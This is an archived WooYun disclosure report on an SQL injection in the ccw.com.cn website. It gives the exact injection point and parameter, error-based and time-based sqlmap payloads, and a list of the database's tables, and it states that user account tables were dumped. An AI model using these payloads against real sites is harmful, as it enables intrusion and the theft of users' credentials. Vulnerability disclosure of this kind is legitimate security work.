当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127819

漏洞标题:计世网主站存在sql注入漏洞泄露用户信息(含大量账号密码)

相关厂商:计世网

漏洞作者: littelfire

提交时间:2015-07-20 11:40

修复时间:2015-07-25 11:42

公开时间:2015-07-25 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

计世网主站存sql注入漏洞

详细说明:

计世网主站存sql注入漏洞,可脱库,可获取所有用户信息

漏洞证明:

首先是注入点:http://www.ccw.com.cn/space/eyan_more/11550 post:page=2&pagesize=20

Parameter: pagesize (POST)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1)


通过注入可以跑出数据库信息

2.jpg


可查看数据库

3.jpg


跑出itjia库中的124个表

4.jpg


+-----------------------+
| appinfo |
| auth_codes |
| dalao |
| ex_applycio |
| ex_arbor |
| ex_attachment |
| ex_bchy |
| ex_buchonghangye |
| ex_ca2014 |
| ex_caexpo |
| ex_card |
| ex_card_group |
| ex_card_ship |
| ex_cardrefuse_ship |
| ex_ccw_index_focus |
| ex_cioforum |
| ex_cioforum2013 |
| ex_ciopw |
| ex_ciopx2012 |
| ex_ciotp |
| ex_cisco |
| ex_citrix |
| ex_city |
| ex_collection |
| ex_collection_group |
| ex_comment |
| ex_community |
| ex_dmf2013 |
| ex_edm |
| ex_emc |
| ex_emc_feedback |
| ex_emc_user |
| ex_emcbiao |
| ex_emcuser |
| ex_emcverify |
| ex_event |
| ex_event_user |
| ex_eyan |
| ex_eyanip |
| ex_haocio_comment |
| ex_huawei |
| ex_huaweiuser |
| ex_ibm |
| ex_intel |
| ex_it2013 |
| ex_itjiaodian4 |
| ex_jiaodian5 |
| ex_jiaodian_base |
| ex_jp |
| ex_letter_status |
| ex_live |
| ex_live_comment |
| ex_live_content |
| ex_meeting |
| ex_meeting_access |
| ex_meeting_ad |
| ex_meeting_apply |
| ex_meeting_comment |
| ex_meeting_file |
| ex_meeting_position |
| ex_meeting_reply |
| ex_meeting_user |
| ex_meeting_video |
| ex_member |
| ex_message |
| ex_minisite |
| ex_noteset |
| ex_offline_huigu |
| ex_offline_lianxi |
| ex_offline_menpiao |
| ex_offline_news |
| ex_offline_richeng |
| ex_offline_zanzhu |
| ex_offline_zuzhi |
| ex_online_bmb |
| ex_online_bmbfield |
| ex_online_jiabin |
| ex_online_jiangpin |
| ex_online_zhuchi |
| ex_onwall |
| ex_pro_tag |
| ex_recommend |
| ex_release |
| ex_reply |
| ex_role |
| ex_rsa |
| ex_setting |
| ex_shouye |
| ex_shouye2show |
| ex_snw2014 |
| ex_snw2014_tech |
| ex_special |
| ex_special_comment |
| ex_special_eyanlist |
| ex_special_report |
| ex_subscribe_cio |
| ex_subscribe_man |
| ex_subscribe_tag |
| ex_system_tag |
| ex_tag |
| ex_tag_relation |
| ex_trade |
| ex_tuwenlive |
| ex_tvforum |
| ex_tvrelease |
| ex_user |
| ex_user_chengjiu |
| ex_user_cominfo |
| ex_user_company |
| ex_user_education |
| ex_user_menu |
| ex_user_privacy |
| ex_user_profile |
| ex_user_role |
| ex_user_role_menu |
| ex_user_status |
| ex_user_weibo |
| ex_video |
| ex_videointerview_old |
| ex_weight_tag |
| ex_yaoqing |
| ex_ztsafe |
| tokens |
| zhongjiang |
+-----------------------+


跑了一下ex_user表和ex_member表中的数据

5.jpg


6.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 littelfire@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-25 11:42

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论